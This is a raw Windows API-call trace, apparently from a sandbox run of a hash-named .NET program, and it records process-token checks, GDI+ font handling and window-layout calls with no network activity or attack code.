[0124.033] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19b14c | out: TokenHandle=0x19b14c*=0x36c) returned 1
[0124.033] GetLastError () returned 0x3f0
[0124.036] GetCurrentProcess () returned 0xffffffff
[0124.036] GetLastError () returned 0x3f0
[0124.036] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19ae38 | out: TokenHandle=0x19ae38*=0x374) returned 1
[0124.036] GetLastError () returned 0x3f0
[0124.037] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config"), fInfoLevelId=0x0, lpFileInformation=0x19ae7c | out: lpFileInformation=0x19ae7c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0124.037] GetLastError () returned 0x2
[0124.038] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config", nBufferLength=0x105, lpBuffer=0x19a990, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config", lpFilePart=0x0) returned 0x65
[0124.038] GetLastError () returned 0x2
[0124.038] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.config"), fInfoLevelId=0x0, lpFileInformation=0x19ae74 | out: lpFileInformation=0x19ae74*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0124.038] GetLastError () returned 0x2
[0124.039] GetCurrentProcess () returned 0xffffffff
[0124.039] GetLastError () returned 0x3f0
[0124.039] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19b14c | out: TokenHandle=0x19b14c*=0x378) returned 1
[0124.039] GetLastError () returned 0x3f0
[0124.050] GetCurrentProcess () returned 0xffffffff
[0124.050] GetLastError () returned 0x3f0
[0124.050] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19b14c | out: TokenHandle=0x19b14c*=0x37c) returned 1
[0124.050] GetLastError () returned 0x3f0
[0124.236] GetCurrentProcess () returned 0xffffffff
[0124.236] GetLastError () returned 0x3f0
[0124.237] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19af30 | out: TokenHandle=0x19af30*=0x380) returned 1
[0124.237] GetLastError () returned 0x3f0
[0124.626] GetCurrentProcess () returned 0xffffffff
[0124.626] GetLastError () returned 0x3f0
[0124.626] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19af40 | out: TokenHandle=0x19af40*=0x384) returned 1
[0124.626] GetLastError () returned 0x3f0
[0125.077] AdjustWindowRectEx (in: lpRect=0x19dd88, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd88) returned 1
[0125.078] AdjustWindowRectEx (in: lpRect=0x19dd88, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd88) returned 1
[0125.078] AdjustWindowRectEx (in: lpRect=0x19dd88, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd88) returned 1
[0125.079] AdjustWindowRectEx (in: lpRect=0x19dd88, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd88) returned 1
[0125.079] AdjustWindowRectEx (in: lpRect=0x19dd88, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd88) returned 1
[0125.080] AdjustWindowRectEx (in: lpRect=0x19dd88, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd88) returned 1
[0125.125] GetDC (hWnd=0x0) returned 0xa0100d0
[0125.126] GetLastError () returned 0x0
[0125.126] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dc84) returned 0x0
[0125.128] GetLastError () returned 0x0
[0125.128] GdipGetFontHeight (font=0x657af30, graphics=0x657f268, height=0x19dc7c) returned 0x0
[0125.128] GetLastError () returned 0x0
[0125.128] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0125.128] GetLastError () returned 0x0
[0125.128] GdipDeleteGraphics (graphics=0x657f268) returned 0x0
[0125.129] GetLastError () returned 0x0
[0125.129] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0125.130] GetLastError () returned 0x0
[0125.166] GetSystemMetrics (nIndex=5) returned 1
[0125.166] GetSystemMetrics (nIndex=6) returned 1
[0125.192] AdjustWindowRectEx (in: lpRect=0x19dd80, dwStyle=0x560101c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dd80) returned 1
[0125.202] GetDC (hWnd=0x0) returned 0xa0100d0
[0125.202] GetLastError () returned 0x0
[0125.202] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dc84) returned 0x0
[0125.203] GetLastError () returned 0x0
[0125.203] GdipGetFontHeight (font=0x657af30, graphics=0x657f268, height=0x19dc7c) returned 0x0
[0125.203] GetLastError () returned 0x0
[0125.203] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0125.203] GetLastError () returned 0x0
[0125.203] GdipDeleteGraphics (graphics=0x657f268) returned 0x0
[0125.203] GetLastError () returned 0x0
[0125.203] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0125.203] GetLastError () returned 0x0
[0125.203] GetSystemMetrics (nIndex=5) returned 1
[0125.203] GetSystemMetrics (nIndex=6) returned 1
[0125.203] AdjustWindowRectEx (in: lpRect=0x19dd80, dwStyle=0x560101c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dd80) returned 1
[0125.206] GetDC (hWnd=0x0) returned 0xa0100d0
[0125.206] GetLastError () returned 0x0
[0125.206] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dc84) returned 0x0
[0125.207] GetLastError () returned 0x0
[0125.207] GdipGetFontHeight (font=0x657af30, graphics=0x657f268, height=0x19dc7c) returned 0x0
[0125.207] GetLastError () returned 0x0
[0125.207] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0125.207] GetLastError () returned 0x0
[0125.207] GdipDeleteGraphics (graphics=0x657f268) returned 0x0
[0125.207] GetLastError () returned 0x0
[0125.207] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0125.207] GetLastError () returned 0x0
[0125.207] GetSystemMetrics (nIndex=5) returned 1
[0125.207] GetSystemMetrics (nIndex=6) returned 1
[0125.207] AdjustWindowRectEx (in: lpRect=0x19dd80, dwStyle=0x560101c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dd80) returned 1
[0125.211] GetDC (hWnd=0x0) returned 0xa0100d0
[0125.211] GetLastError () returned 0x0
[0125.211] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dc84) returned 0x0
[0125.212] GetLastError () returned 0x0
[0125.212] GdipGetFontHeight (font=0x657af30, graphics=0x657f268, height=0x19dc7c) returned 0x0
[0125.212] GetLastError () returned 0x0
[0125.212] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0125.212] GetLastError () returned 0x0
[0125.212] GdipDeleteGraphics (graphics=0x657f268) returned 0x0
[0125.212] GetLastError () returned 0x0
[0125.212] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0125.212] GetLastError () returned 0x0
[0125.212] GetSystemMetrics (nIndex=5) returned 1
[0125.212] GetSystemMetrics (nIndex=6) returned 1
[0125.212] AdjustWindowRectEx (in: lpRect=0x19dd80, dwStyle=0x560101c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dd80) returned 1
[0125.214] AdjustWindowRectEx (in: lpRect=0x19dd78, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd78) returned 1
[0125.220] AdjustWindowRectEx (in: lpRect=0x19dd78, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd78) returned 1
[0125.223] GetDC (hWnd=0x0) returned 0xa0100d0
[0125.223] GetLastError () returned 0x0
[0125.223] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dc84) returned 0x0
[0125.223] GetLastError () returned 0x0
[0125.223] GdipGetFontHeight (font=0x657af30, graphics=0x657f268, height=0x19dc7c) returned 0x0
[0125.223] GetLastError () returned 0x0
[0125.223] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0125.223] GetLastError () returned 0x0
[0125.223] GdipDeleteGraphics (graphics=0x657f268) returned 0x0
[0125.223] GetLastError () returned 0x0
[0125.223] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0125.224] GetLastError () returned 0x0
[0125.224] GetSystemMetrics (nIndex=5) returned 1
[0125.224] GetSystemMetrics (nIndex=6) returned 1
[0125.224] AdjustWindowRectEx (in: lpRect=0x19dd80, dwStyle=0x560101c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dd80) returned 1
[0125.224] AdjustWindowRectEx (in: lpRect=0x19dd88, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd88) returned 1
[0125.225] AdjustWindowRectEx (in: lpRect=0x19dd88, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd88) returned 1
[0125.226] GetDC (hWnd=0x0) returned 0xa0100d0
[0125.226] GetLastError () returned 0x0
[0125.226] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dc84) returned 0x0
[0125.226] GetLastError () returned 0x0
[0125.226] GdipGetFontHeight (font=0x657af30, graphics=0x657f268, height=0x19dc7c) returned 0x0
[0125.226] GetLastError () returned 0x0
[0125.226] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0125.226] GetLastError () returned 0x0
[0125.226] GdipDeleteGraphics (graphics=0x657f268) returned 0x0
[0125.226] GetLastError () returned 0x0
[0125.226] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0125.227] GetLastError () returned 0x0
[0125.227] GetSystemMetrics (nIndex=5) returned 1
[0125.227] GetSystemMetrics (nIndex=6) returned 1
[0125.227] AdjustWindowRectEx (in: lpRect=0x19dd80, dwStyle=0x560101c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dd80) returned 1
[0125.228] AdjustWindowRectEx (in: lpRect=0x19dd88, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd88) returned 1
[0125.229] AdjustWindowRectEx (in: lpRect=0x19dd88, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd88) returned 1
[0125.230] AdjustWindowRectEx (in: lpRect=0x19dd88, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd88) returned 1
[0125.246] AdjustWindowRectEx (in: lpRect=0x19dd78, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd78) returned 1
[0125.260] AdjustWindowRectEx (in: lpRect=0x19dd78, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd78) returned 1
[0125.289] GetDC (hWnd=0x0) returned 0xa0100d0
[0125.289] GetLastError () returned 0x0
[0125.289] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dc08) returned 0x0
[0125.289] GetLastError () returned 0x0
[0125.289] GdipGetFontHeight (font=0x657af30, graphics=0x657f268, height=0x19dc00) returned 0x0
[0125.289] GetLastError () returned 0x0
[0125.289] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0125.289] GetLastError () returned 0x0
[0125.290] GdipDeleteGraphics (graphics=0x657f268) returned 0x0
[0125.290] GetLastError () returned 0x0
[0125.290] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0125.290] GetLastError () returned 0x0
[0125.364] GdipGetFamilyName (in: family=0x6574b40, name=0x786f40, language=0x409 | out: name="Microsoft Sans Serif") returned 0x0
[0125.364] GetLastError () returned 0x0
[0125.419] CreateCompatibleDC (hdc=0x0) returned 0x380106da
[0125.419] GetLastError () returned 0x0
[0125.429] GetCurrentObject (hdc=0x380106da, type=0x1) returned 0x1b00017
[0125.429] GetLastError () returned 0x0
[0125.429] GetCurrentObject (hdc=0x380106da, type=0x2) returned 0x1900010
[0125.429] GetLastError () returned 0x0
[0125.429] GetCurrentObject (hdc=0x380106da, type=0x7) returned 0x185000f
[0125.430] GetLastError () returned 0x0
[0125.430] GetCurrentObject (hdc=0x380106da, type=0x6) returned 0x18a0048
[0125.430] GetLastError () returned 0x0
[0125.437] SaveDC (hdc=0x380106da) returned 1
[0125.437] GetLastError () returned 0x0
[0125.440] GetDeviceCaps (hdc=0x380106da, index=90) returned 96
[0125.441] GetLastError () returned 0x0
[0125.442] CreateFontIndirectW (lplf=0x73db10) returned 0x2a0a0693
[0125.442] GetLastError () returned 0x0
[0125.447] GetObjectW (in: h=0x2a0a0693, c=92, pv=0x73db10 | out: pv=0x73db10) returned 92
[0125.447] GetLastError () returned 0x0
[0125.509] GetCurrentObject (hdc=0x380106da, type=0x6) returned 0x18a0048
[0125.509] GetLastError () returned 0x0
[0125.510] GetObjectW (in: h=0x18a0048, c=92, pv=0x73db10 | out: pv=0x73db10) returned 92
[0125.510] GetLastError () returned 0x0
[0125.526] SelectObject (hdc=0x380106da, h=0x2a0a0693) returned 0x18a0048
[0125.526] GetLastError () returned 0x0
[0125.530] GetMapMode (hdc=0x380106da) returned 1
[0125.530] GetLastError () returned 0x0
[0125.531] GetTextMetricsW (in: hdc=0x380106da, lptm=0x19dae8 | out: lptm=0x19dae8) returned 1
[0125.532] GetLastError () returned 0x0
[0125.534] DrawTextExW (in: hdc=0x380106da, lpchText="j^", cchText=2, lprc=0x19dbf4, format=0x420, lpdtp=0x2775024 | out: lpchText="j^", lprc=0x19dbf4) returned 13
[0125.593] GetLastError () returned 0x0
[0125.594] GetSystemMetrics (nIndex=5) returned 1
[0125.594] GetSystemMetrics (nIndex=6) returned 1
[0125.616] DrawTextExW (in: hdc=0x380106da, lpchText="j^", cchText=2, lprc=0x19dbec, format=0x420, lpdtp=0x27750c8 | out: lpchText="j^", lprc=0x19dbec) returned 13
[0125.617] GetLastError () returned 0x0
[0125.617] GetSystemMetrics (nIndex=5) returned 1
[0125.617] GetSystemMetrics (nIndex=6) returned 1
[0125.637] AdjustWindowRectEx (in: lpRect=0x19dd84, dwStyle=0x56210242, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dd84) returned 1
[0125.639] GetDC (hWnd=0x0) returned 0xa0100d0
[0125.639] GetLastError () returned 0x0
[0125.639] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dc84) returned 0x0
[0125.639] GetLastError () returned 0x0
[0125.639] GdipGetFontHeight (font=0x657af30, graphics=0x657f268, height=0x19dc7c) returned 0x0
[0125.639] GetLastError () returned 0x0
[0125.639] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0125.639] GetLastError () returned 0x0
[0125.639] GdipDeleteGraphics (graphics=0x657f268) returned 0x0
[0125.639] GetLastError () returned 0x0
[0125.639] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0125.639] GetLastError () returned 0x0
[0125.639] GetSystemMetrics (nIndex=5) returned 1
[0125.640] GetSystemMetrics (nIndex=6) returned 1
[0125.640] AdjustWindowRectEx (in: lpRect=0x19dd80, dwStyle=0x560101c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dd80) returned 1
[0125.643] GetDC (hWnd=0x0) returned 0xa0100d0
[0125.644] GetLastError () returned 0x0
[0125.644] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dc84) returned 0x0
[0125.644] GetLastError () returned 0x0
[0125.644] GdipGetFontHeight (font=0x657af30, graphics=0x657f268, height=0x19dc7c) returned 0x0
[0125.644] GetLastError () returned 0x0
[0125.644] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0125.644] GetLastError () returned 0x0
[0125.644] GdipDeleteGraphics (graphics=0x657f268) returned 0x0
[0125.644] GetLastError () returned 0x0
[0125.644] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0125.644] GetLastError () returned 0x0
[0125.644] GetSystemMetrics (nIndex=5) returned 1
[0125.644] GetSystemMetrics (nIndex=6) returned 1
[0125.644] AdjustWindowRectEx (in: lpRect=0x19dd80, dwStyle=0x560101c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dd80) returned 1
[0125.881] sprintf_s (in: _DstBuf=0x19c034, _DstSize=0x12, _Format="set_%s" | out: _DstBuf="set_SharedState") returned 15
[0126.116] _DllBidInitialize@0 () returned 0x0
[0126.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_32\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll", nBufferLength=0x105, lpBuffer=0x19d05c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_32\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll", lpFilePart=0x0) returned 0x50
[0126.121] GetLastError () returned 0x7f
[0126.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_32\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll", nBufferLength=0x105, lpBuffer=0x19cfe8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_32\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll", lpFilePart=0x0) returned 0x50
[0126.121] GetLastError () returned 0x7f
[0126.168] CoTaskMemAlloc (cb=0x8a) returned 0x78a6a8
[0126.168] CoTaskMemAlloc (cb=0xa2) returned 0x761e50
[0126.168] _DllBidEntryPoint@36 () returned 0x1
[0126.168] CoTaskMemFree (pv=0x78a6a8)
[0126.168] CoTaskMemFree (pv=0x761e50)
[0126.186] _DllBidCtlProc@24 () returned 0x0
[0126.186] _DllBidCtlProc@24 () returned 0x0
[0126.186] _DllBidCtlProc@24 () returned 0x0
[0126.186] _DllBidCtlProc@24 () returned 0x0
[0126.186] _DllBidCtlProc@24 () returned 0x0
[0126.186] _DllBidCtlProc@24 () returned 0x0
[0126.186] _DllBidCtlProc@24 () returned 0x0
[0126.410] AdjustWindowRectEx (in: lpRect=0x19dd88, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd88) returned 1
[0126.411] AdjustWindowRectEx (in: lpRect=0x19dd88, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd88) returned 1
[0126.413] AdjustWindowRectEx (in: lpRect=0x19dd78, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd78) returned 1
[0126.415] AdjustWindowRectEx (in: lpRect=0x19dd88, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd88) returned 1
[0126.416] AdjustWindowRectEx (in: lpRect=0x19dd88, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dd88) returned 1
[0126.420] SetLastError (dwErrCode=0x0)
[0126.444] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.444] GetLastError () returned 0x0
[0126.444] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x277dfec) returned 0x0
[0126.459] GetLastError () returned 0x0
[0126.459] GdipGetFontSize (font=0x546efc0, size=0x277dff0) returned 0x0
[0126.459] GetLastError () returned 0x0
[0126.471] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.473] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.541] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.541] GetLastError () returned 0x0
[0126.541] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x277e23c) returned 0x0
[0126.541] GetLastError () returned 0x0
[0126.541] GdipGetFontSize (font=0x657f3b8, size=0x277e240) returned 0x0
[0126.541] GetLastError () returned 0x0
[0126.541] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.541] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.542] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.542] GetLastError () returned 0x0
[0126.542] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x277e48c) returned 0x0
[0126.542] GetLastError () returned 0x0
[0126.542] GdipGetFontSize (font=0x657f3e0, size=0x277e490) returned 0x0
[0126.542] GetLastError () returned 0x0
[0126.542] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.542] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.543] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.543] GetLastError () returned 0x0
[0126.543] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x277e6dc) returned 0x0
[0126.543] GetLastError () returned 0x0
[0126.543] GdipGetFontSize (font=0x657f408, size=0x277e6e0) returned 0x0
[0126.543] GetLastError () returned 0x0
[0126.543] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.543] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.544] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.544] GetLastError () returned 0x0
[0126.544] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x277e92c) returned 0x0
[0126.544] GetLastError () returned 0x0
[0126.544] GdipGetFontSize (font=0x657f430, size=0x277e930) returned 0x0
[0126.544] GetLastError () returned 0x0
[0126.544] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.544] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.544] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.544] GetLastError () returned 0x0
[0126.544] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x277eb7c) returned 0x0
[0126.544] GetLastError () returned 0x0
[0126.544] GdipGetFontSize (font=0x657f458, size=0x277eb80) returned 0x0
[0126.544] GetLastError () returned 0x0
[0126.545] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.545] AdjustWindowRectEx (in: lpRect=0x19dce8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x19dce8) returned 1
[0126.545] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.545] GetLastError () returned 0x0
[0126.545] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x277ed3c) returned 0x0
[0126.545] GetLastError () returned 0x0
[0126.545] GdipGetFontSize (font=0x657f480, size=0x277ed40) returned 0x0
[0126.545] GetLastError () returned 0x0
[0126.545] GetDC (hWnd=0x0) returned 0xa0100d0
[0126.545] GetLastError () returned 0x0
[0126.545] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dd38) returned 0x0
[0126.546] GetLastError () returned 0x0
[0126.546] GdipGetFontHeight (font=0x657f480, graphics=0x657f4a8, height=0x19dd30) returned 0x0
[0126.546] GetLastError () returned 0x0
[0126.546] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0126.546] GetLastError () returned 0x0
[0126.546] GdipDeleteGraphics (graphics=0x657f4a8) returned 0x0
[0126.546] GetLastError () returned 0x0
[0126.546] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0126.546] GetLastError () returned 0x0
[0126.558] GetDC (hWnd=0x0) returned 0xa0100d0
[0126.558] GetLastError () returned 0x0
[0126.558] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dccc) returned 0x0
[0126.570] GetLastError () returned 0x0
[0126.570] GdipGetFontHeight (font=0x657f480, graphics=0x657f4a8, height=0x19dcc4) returned 0x0
[0126.570] GetLastError () returned 0x0
[0126.570] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0126.570] GetLastError () returned 0x0
[0126.570] GdipDeleteGraphics (graphics=0x657f4a8) returned 0x0
[0126.570] GetLastError () returned 0x0
[0126.570] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0126.570] GetLastError () returned 0x0
[0126.570] GetSystemMetrics (nIndex=5) returned 1
[0126.570] GetSystemMetrics (nIndex=6) returned 1
[0126.581] GetSystemMetrics (nIndex=5) returned 1
[0126.581] GetSystemMetrics (nIndex=6) returned 1
[0126.582] AdjustWindowRectEx (in: lpRect=0x19dc84, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dc84) returned 1
[0126.589] GetSystemMetrics (nIndex=5) returned 1
[0126.589] GetSystemMetrics (nIndex=6) returned 1
[0126.589] AdjustWindowRectEx (in: lpRect=0x19dcf0, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dcf0) returned 1
[0126.591] GetSystemMetrics (nIndex=5) returned 1
[0126.591] GetSystemMetrics (nIndex=6) returned 1
[0126.592] AdjustWindowRectEx (in: lpRect=0x19dcf0, dwStyle=0x560100c0, bMenu=0, dwExStyle=0x200 | out: lpRect=0x19dcf0) returned 1
[0126.592] GdipCreateFontFamilyFromName (name="Segoe UI", fontCollection=0x0, fontFamily=0x19dd5c) returned 0x0
[0126.592] GetLastError () returned 0x0
[0126.593] GdipCreateFont (fontFamily=0x65769f0, emSize=0x41640000, style=1, unit=0x3, font=0x277ef44) returned 0x0
[0126.593] GetLastError () returned 0x0
[0126.593] GdipGetFontSize (font=0x657f4a8, size=0x277ef48) returned 0x0
[0126.593] GetLastError () returned 0x0
[0126.593] GetDC (hWnd=0x0) returned 0xa0100d0
[0126.593] GetLastError () returned 0x0
[0126.593] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dd38) returned 0x0
[0126.593] GetLastError () returned 0x0
[0126.594] GdipGetFontHeight (font=0x657f4a8, graphics=0x657f4d0, height=0x19dd30) returned 0x0
[0126.594] GetLastError () returned 0x0
[0126.594] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0126.594] GetLastError () returned 0x0
[0126.594] GdipDeleteGraphics (graphics=0x657f4d0) returned 0x0
[0126.594] GetLastError () returned 0x0
[0126.594] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0126.594] GetLastError () returned 0x0
[0126.594] GetDC (hWnd=0x0) returned 0xa0100d0
[0126.594] GetLastError () returned 0x0
[0126.594] GdipCreateFromHDC (hdc=0xa0100d0, graphics=0x19dccc) returned 0x0
[0126.594] GetLastError () returned 0x0
[0126.594] GdipGetFontHeight (font=0x657f4a8, graphics=0x657f4d0, height=0x19dcc4) returned 0x0
[0126.594] GetLastError () returned 0x0
[0126.594] FindAtomW (lpString="GDI+Atom_2800_1") returned 0xc000
[0126.595] GetLastError () returned 0x0
[0126.595] GdipDeleteGraphics (graphics=0x657f4d0) returned 0x0
[0126.595] GetLastError () returned 0x0
[0126.595] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1
[0126.595] GetLastError () returned 0x0
[0126.595] GetSystemMetrics (nIndex=5) returned 1
[0126.595] GetSystemMetrics (nIndex=6) returned 1
